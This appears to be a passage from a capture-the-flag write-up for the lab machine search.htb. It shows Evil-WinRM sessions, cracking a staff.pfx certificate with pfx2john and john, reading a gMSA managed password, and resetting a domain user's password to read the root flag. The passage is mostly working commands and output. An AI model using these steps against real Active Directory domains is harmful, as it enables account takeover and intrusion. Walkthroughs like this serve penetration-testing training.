Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\BIR-ADFS-GMSA$\Documents> net user tristan.davies 'Pa%%w.rD!!2' /domain
The command completed successfully.
With the password being changed you could enter another WINRM session as tristan and read the rootflag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ evil-winrm -i search.htb -u tristan.davies -p 'Pa%%w.rD!!2'
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Tristan.Davies\Documents> cat \users\administrator\desktop\root.txt | measure -c
Lines Words Characters Property
----- ----- ---------- --------
32
*Evil-WinRM* PS C:\Users\Tristan.Davies\Documents>
Cert
The actually intended way involved finding the staff certificate in Sierraโs downloads folder on her home share. We found earlier that there is a /staff route on the webserver which returns a 403 error.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ smbclient.py 'search.htb/Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18'@search.htb
Impacket v0.9.23.dev1+20210111.162220.7100210f - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# use RedirectedFolders$
# cd sierra.frye
# cd Downloads
# ls
drw-rw-rw- 0 Fri Jul 31 14:45:36 2020 .
drw-rw-rw- 0 Fri Jul 31 14:45:36 2020 ..
drw-rw-rw- 0 Thu Jul 30 17:25:57 2020 $RECYCLE.BIN
drw-rw-rw- 0 Mon Aug 10 20:39:17 2020 Backups
-rw-rw-rw- 282 Fri Jul 31 14:42:18 2020 desktop.ini
# cd Backups
# ls
drw-rw-rw- 0 Mon Aug 10 20:39:17 2020 .
drw-rw-rw- 0 Mon Aug 10 20:39:17 2020 ..
-rw-rw-rw- 2643 Fri Jul 31 15:04:11 2020 search-RESEARCH-CA.p12
-rw-rw-rw- 4326 Mon Aug 10 20:39:17 2020 staff.pfx
# get search-RESEARCH-CA.p12
# get staff.pfx
The certificate is password protectet. A quick way to get a crackable hash is pfx2john.py. The port of the script version from python2 to 3 was not fully done so there were python3 binary string specifiers still in the output. All that is needed to clean up is to remove the b'' parts.
1
2
$ /usr/share/john/pfx2john.py staff.pfx
staff.pfx:$pfxng$1$20$2000$20$b'ab06d852d1875d818341c5737782c7117277265e'$b'...[snip]...
The cleaned hash cracks rather quickly using john with rockyou.
1
2
3
4
5
6
7
8
9
10
11
12
13
$ /usr/share/john/pfx2john.py staff.pfx > certhash
$ vi certhash
$ john --wordlist=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt certhash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx [PKCS12 PBE (.pfx, .p12) (SHA-1 to SHA-512) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy (staff.pfx)
1g 0:00:00:55 DONE (2021-12-19 09:53) 0.01818g/s 99718p/s 99718c/s 99718C/s misssnail..missnona16
Use the "--show" option to display all of the cracked passwords reliably
Session completed
To use the certificate we first import it into our browser.
Browing to /staff now we are able to authenticate us as Sierra.
In the PowerShell Web Access login in we enter the credentials for Sierra.
Now we are able to issue commands remotly on the target.
The steps from here are pretty much the same as with RSAT. We first retrieve the gMSA password for BIR-ADFS-GMSA$.
1
2
3
4
PS C:\Users\Sierra.Frye\Documents>
$gmsa = Get-ADServiceAccount -Identity BIR-ADFS-GMSA -Properties 'msds-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents>
$pass = ConvertTo-SecureString -AsPlainText -Force ((ConvertFrom-ADManagedPasswordBlob($gmsa.'msds-ManagedPassword')).'CurrentPassword')
Next we impersonate BIR-ADFS-GMSA$ to change the password of tristan.davies
1
2
3
4
5
6
7
8
PS C:\Users\Sierra.Frye\Documents>
$user = 'BIR-ADFS-GMSA$'
PS C:\Users\Sierra.Frye\Documents>
$cred = New-Object System.Management.Automation.PSCredential($user,$pass)
PS C:\Users\Sierra.Frye\Documents>
$newpass = ConvertTo-SecureString -AsPlainText -force 'Pa%%w.rD!!3'
PS C:\Users\Sierra.Frye\Documents>
Set-ADAccountPassword -Identity Tristan.Davies -reset -NewPassword $newpass -Credential $cred
Impersonating tristan we are now able to add the root flag to our collection.
1
2
3
4
5
6
7
8
9
10
11
12
PS C:\Users\Sierra.Frye\Documents>
$cred2 = New-Object System.Management.Automation.PSCredential('search.htb\tristan.davies',$newpass)
PS C:\Users\Sierra.Frye\Documents>
invoke-command -computername 127.0.0.1 -credential $cred2 -scriptblock {whoami}
search\tristan.davies
PS C:\Users\Sierra.Frye\Documents>
invoke-command -computername 127.0.0.1 -credential $cred2 -scriptblock {cat \users\administrator\desktop\root.txt | measure -c}
Lines Words Characters Property PSComputerName
----- ----- ---------- -------- --------------
32 127.0.0.1